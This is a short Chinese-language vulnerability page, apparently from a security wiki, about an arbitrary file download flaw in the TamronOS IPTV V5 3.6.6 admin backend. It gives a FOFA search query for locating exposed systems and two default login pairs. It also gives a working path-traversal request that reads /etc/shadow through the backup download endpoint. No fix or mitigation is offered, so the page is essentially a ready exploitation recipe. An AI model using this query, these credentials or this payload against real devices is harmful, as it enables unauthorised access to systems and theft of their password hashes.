TamronOS_IPTV系統後台任意文件下載漏洞_zh-cn

# TamronOS IPTV系統後台任意文件下載漏洞/zh-cn

==漏洞影响==

TamronOS IPTV V5 3.6.6

==FOFA==

title="TamronOS IPTV系统"

==弱口令==

admin/123456
test/123456

==漏洞利用==

系统设置 — 数据库自动备份,下载文件并且抓包。
修改参数,Payload如下:

GET /download/backup?name=./../../../../../etc/shadow

{| style=”margin: auto; width: 750px;”
| style=”text-align: left; margin: 1em 1em 1em 0; border: 1px solid #20A3C0; padding: .2em;” |
{| cellspacing=”2px”
| valign=”middle” | [[Image:Copyright.png|50px]]
| 這個作品受到版權保護。
|}
|}

© 版权声明
THE END
喜欢就支持一下吧
点赞0赞赏 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容